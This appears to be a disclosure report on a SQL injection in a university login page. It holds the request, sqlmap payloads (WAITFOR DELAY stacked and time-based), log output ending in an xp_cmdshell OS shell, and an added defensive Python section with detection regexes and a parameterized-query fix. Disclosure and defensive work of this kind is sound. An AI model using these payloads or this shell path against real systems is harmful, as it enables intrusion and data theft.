2015-12-01: Details reported to the vendor and awaiting vendor handling
2015-12-01: Vendor has confirmed; details disclosed to the vendor only
2015-12-11: Details disclosed to core white hats and relevant domain experts
2015-12-21: Details disclosed to regular white hats
2015-12-31: Details disclosed to intern white hats
2016-01-15: Details disclosed to the public
Here I am again, digging up an SQL injection at a login page
0x01 Vulnerability description
A POST-based SQL injection exists at the login page. Testing showed that the injected queries run as a database user with DBA privileges, so a shell can be written directly to obtain control of the server; the entire contents of the database are of course also exposed.
0x02 Vulnerable site
http://gsl.sdu.edu.cn/
0x03 Vulnerability location
Login page
0x04 HTTP request parameters
POST /indexlogin.jsp HTTP/1.1
Host: gsl.sdu.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://gsl.sdu.edu.cn/index.jsp
Cookie: JSESSIONID=9CE728665B08B18DAC710FE3EBF8A791
Connection: keep-alive

useraccount=aaa&userpassword=aaaaa
0x05 Exploitation tool
sqlmap
0x06 Proof of vulnerability
Injection point type information obtained:
---
Place: POST
Parameter: useraccount
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: useraccount=aaa'; WAITFOR DELAY '0:0:5'--&userpassword=aaaaa

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: useraccount=aaa' WAITFOR DELAY '0:0:5'--&userpassword=aaaaa
---
[15:22:27] [INFO] testing Microsoft SQL Server
[15:22:27] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[15:22:34] [INFO] confirming Microsoft SQL Server
[15:23:10] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2008
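Both sqlmap payloads above work for the same reason: the login query splices the `useraccount` field straight into SQL text, so the single quote in the payload closes the string literal and `WAITFOR DELAY` is parsed as a statement rather than as data. The Python below is an added example written for this page; it is not code from the report or from the affected site, and the JSP source was never shown. It demonstrates three things from the defender's side: the assumed shape of the concatenated query and a heuristic that makes visible which part of the input escaped its literal, a small request-body check that flags the stacked-query and time-delay patterns seen in this report (while letting a plain apostrophe such as o'brien through), and a parameterized login query in which the same payload is just a non-matching string. The table and column names, the demo credentials, and the use of sqlite3 `?` placeholders in place of a JDBC `PreparedStatement` are all assumptions; the form field names are the ones from the request above.

```python
import hashlib
import re
import sqlite3
from urllib.parse import parse_qs, urlencode

# Constructed sample values: the benign credentials from the report's request
# body and the two payloads sqlmap reported for the `useraccount` field.
BENIGN_ACCOUNT = "aaa"
BENIGN_PASSWORD = "aaaaa"
STACKED_PAYLOAD = "aaa'; WAITFOR DELAY '0:0:5'--"
TIME_BASED_PAYLOAD = "aaa' WAITFOR DELAY '0:0:5'--"


def build_query_by_concatenation(useraccount: str, userpassword: str) -> str:
    """Assumed shape of the vulnerable login query (the report does not show the
    JSP source): user input is glued into the SQL text, so a single quote in the
    input terminates the literal and everything after it is parsed as SQL."""
    return ("SELECT id FROM users WHERE account = '" + useraccount
            + "' AND password = '" + userpassword + "'")


def sql_outside_literals(sql: str) -> str:
    """Heuristic: blank out every single-quoted literal (handling the '' escape)
    so that only the text the database would parse as code remains. Input that
    stayed inside a literal disappears; input that escaped its literal shows up."""
    return re.sub(r"'(?:[^']|'')*'", "''", sql)


# Request-body patterns matching the techniques sqlmap used in this report.
RULES = {
    "time_delay": re.compile(r"\bwaitfor\s+delay\b", re.IGNORECASE),
    "stacked_after_quote": re.compile(r"'\s*;"),   # literal closed, new statement
    "quote_then_comment": re.compile(r"'.*--"),    # literal closed, rest commented out
}


def encode_login_form(useraccount: str, userpassword: str) -> str:
    """Build the URL-encoded body a browser would send to /indexlogin.jsp."""
    return urlencode({"useraccount": useraccount, "userpassword": userpassword})


def flag_request_body(body: str) -> dict[str, list[str]]:
    """Return {field: [rule names]} for each form field whose decoded value trips
    one of RULES; fields with no hits are omitted. A lone apostrophe is not
    enough to flag, so a name like o'brien passes through."""
    hits: dict[str, list[str]] = {}
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            matched = [name for name, pat in RULES.items() if pat.search(value)]
            if matched:
                hits[field] = matched
    return hits


def hash_password(password: str) -> str:
    # Demo only: a real login should use a slow salted hash such as bcrypt or argon2.
    return hashlib.sha256(password.encode()).hexdigest()


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory users table with one account (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, account TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO users (account, password_hash) VALUES (?, ?)",
                 (BENIGN_ACCOUNT, hash_password(BENIGN_PASSWORD)))
    conn.commit()
    return conn


def login_parameterized(conn: sqlite3.Connection, useraccount: str, userpassword: str) -> bool:
    """Hardened login: the driver binds the values, so a quote or semicolon in
    `useraccount` is only characters to compare against, never SQL syntax
    (sqlite3 '?' placeholders here; a PreparedStatement in the JSP application)."""
    row = conn.execute(
        "SELECT id FROM users WHERE account = ? AND password_hash = ?",
        (useraccount, hash_password(userpassword)),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    for label, account in (("benign", BENIGN_ACCOUNT), ("stacked", STACKED_PAYLOAD)):
        q = build_query_by_concatenation(account, BENIGN_PASSWORD)
        print(f"{label:8} concatenated:   {q}")
        print(f"{'':8} parsed as code: {sql_outside_literals(q)}")
    for account in (BENIGN_ACCOUNT, STACKED_PAYLOAD, TIME_BASED_PAYLOAD, "o'brien"):
        print("flags:", flag_request_body(encode_login_form(account, BENIGN_PASSWORD)))
    conn = make_demo_db()
    print("parameterized login, real creds:", login_parameterized(conn, BENIGN_ACCOUNT, BENIGN_PASSWORD))
    print("parameterized login, payload:   ", login_parameterized(conn, STACKED_PAYLOAD, BENIGN_PASSWORD))
```

The request-body rules are a detection aid, not a fix: they only recognise the specific shapes sqlmap used here and would miss encodings or variants, whereas the parameterized query removes the injection regardless of what the field contains. The later part of this report (a DBA-privileged login that can reach xp_cmdshell) is the second thing to address: the account the web application connects with should not hold sysadmin rights in the first place.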
Database user type: DBA privileges
[15:25:40] [INFO] testing if current user is DBA
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
current user is DBA: True
os-shell obtained successfully
[15:54:53] [INFO] retrieved: 0
[15:54:53] [INFO] fingerprinting the back-end DBMS operating system version and service pack
[15:55:00] [INFO] the back-end DBMS operating system is Windows 7 Service Pack 0
[15:55:01] [INFO] testing if current user is DBA
[15:55:01] [INFO] checking if xp_cmdshell extended procedure is available, please wait..
[15:55:12] [INFO] xp_cmdshell extended procedure is available
[15:55:20] [INFO] testing if xp_cmdshell extended procedure is usable
[15:58:29] [ERROR] invalid character detected. retrying..
[15:58:29] [WARNING] increasing time delay to 6 seconds
[15:59:31] [ERROR] invalid character detected. retrying..
[15:59:31] [WARNING] increasing time delay to 7 seconds
[16:01:22] [INFO] xp_cmdshell extended procedure is usable
[16:01:22] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[16:01:22] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
From here, running commands and so on needs no explanation from me. The impact is severe, so I'll stop at this point and not go on to intranet penetration.
Filter the input.
Severity: Low
Vulnerability Rank: 4
Confirmed at: 2015-12-01 14:03
Reported to the unit that owns the system
None yet